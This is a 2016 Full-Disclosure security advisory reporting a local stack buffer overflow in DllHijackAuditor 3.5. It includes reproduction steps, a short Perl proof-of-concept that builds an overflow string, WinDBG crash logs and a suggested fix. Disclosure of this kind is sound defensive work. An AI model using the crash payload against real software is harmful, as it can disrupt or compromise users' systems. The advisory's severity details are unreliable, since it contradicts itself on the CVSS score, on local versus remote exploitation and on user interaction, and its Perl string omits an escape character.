lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 23 Sep 2016 11:35:51 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] DllHijackAuditor 3.5 - Stack Buffer Overflow Vulnerability

Document Title:
===============
DllHijackAuditor 3.5 - Stack Buffer Overflow Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1954


Release Date:
=============
2016-09-21


Vulnerability Laboratory ID (VL-ID):
====================================
1954


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
DLL Hijack Auditor is the smart tool to Audit against the Dll Hijacking Vulnerability in any Windows application.
This is one of the critical security issue affecting almost all Windows systems. Though most of the apps have been 
fixed, but still many Windows applications are susceptible to this vulnerability which can allow any attacker to 
completely take over the system. DllHijackAuditor helps in discovering all such Vulnerable Dlls in a Windows 
application which otherwise can lead to successful exploitation resulting in total compromise of the system. 

(Copy of the Homepage: http://securityxploded.com/)


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a stack buffer overflow vulnerability in the DllHijackAuditor v3.5 software.


Vulnerability Disclosure Timeline:
==================================
2016-09-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SecurityXploded
Product: DllHijackAuditor - Software 3.5


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local stack buffer overflow vulnerability has been discovered in the official DllHijackAuditor v3.5 software.
The overflow vulnerability allows remote attackers to take-over the process by overwrite of the active registers.

The stack buffer overflow vulnerability is located in the `Specify Extension Entry` module of the software. Local 
attackers are able to include unicode as malicious payload to crash software via stack overflow. Thus allows the 
local attacker to overwrite for example the eip register to take control of the vulnerable software process. 

The security risk of the issue is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. 
Exploitation of the vulnerability requires a low privileged system user account or restricted access without user interaction. 
Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.

Vulnerable Input(s):
[+] Specify Extension - (Entry)


Proof of Concept (PoC):
=======================
A local stack overflow vulnerability can be exploited by local attackers without user interaction and with privileged system user account.
For security demonstration or to reproduce the sofwtare vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Launch the DllHijackAuditors.exe software process
2. Run the code in perl and a file format (.txt) will create
3. Copy  the AAAAAAAAA+... string from DllHijackAuditor.txt to clipboard
4. Paste it to the input Specify Extension AAAAAAAAA+... string and click `Start Audit` to process
5. Software crash permanently by a stack overflow
6. Successfully reproduce of the local stack buffer overflow vulnerability!


PoC: Exploit Code (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 3000;
open(MYFILE,'>>DllHijackAuditor.txt');
print MYFILE $Buff;
close(MYFILE);
print " POC Created by ZwXn";


--- PoC Debug Session Logs [WinDBG] ---
Stack buffer overflow - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=0059c60c ecx=00000005 edx=773913f0 esi=0766fc7c edi=0014d2c0
eip=00529e5b esp=0766f5b8 ebp=0766f5d0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
DllHijackAuditor+0x129e5b:
00529e5b cd29            int     29h
-
EXCEPTION_RECORD:  ffffffff -- (.exr ffffffffffffffff)
ExceptionAddress: 00529e5b (DllHijackAuditor+0x00129e5b)
   ExceptionCode: c0000409 (Stack buffer overflow)
   ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 00000005
-
FAULTING_THREAD:  00000754
BUGCHECK_STR:  STACK_OVERRUN
PROCESS_NAME:  DllHijackAuditor.exe
FAULTING_MODULE: 77300000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP:  534bb17f
ERROR_CODE: (NTSTATUS) 0xc0000409 - 
Le syst me a d tect  la saturation de la m moire tampon dans cette application. Cette saturation pourrait permettre  un utilisateur mal intentionn  de prendre le contr le de cette application.
DEFAULT_BUCKET_ID:  WRONG_SYMBOLS
LAST_CONTROL_TRANSFER:  from 00529e49 to 00529e5b
-
0:004> d esi
0766fc7c  00 3a 5c 55 73 65 72 73-5c 5a 77 58 5c 41 70 70  .:UsersZwXApp
0766fc8c  44 61 74 61 5c 4c 6f 63-61 6c 5c 54 65 6d 70 5c  DataLocalTemp
0766fc9c  44 6c 6c 48 69 6a 61 63-6b 41 75 64 69 74 5f 41  DllHijackAudit_A
0766fcac  70 70 43 72 61 73 68 56-69 65 77 2e 65 78 65 5f  ppCrashView.exe_
0766fcbc  32 30 30 34 37 33 35 35-33 36 5c 74 65 73 74 2e  2004735536test.
0766fccc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fcdc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fcec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:004> d 0766fcec
0766fcec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fcfc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd0c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd1c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd2c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd3c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd4c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd5c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA




Solution - Fix & Patch:
=======================
Restrict the number of characters in the input of the `Specify Extension Entry` module and allocate the memory to prevent exploitation.


Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability in the software core is estimated as high. (CVSS 6.3)


Credits & Authors:
==================
ZwX - [http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ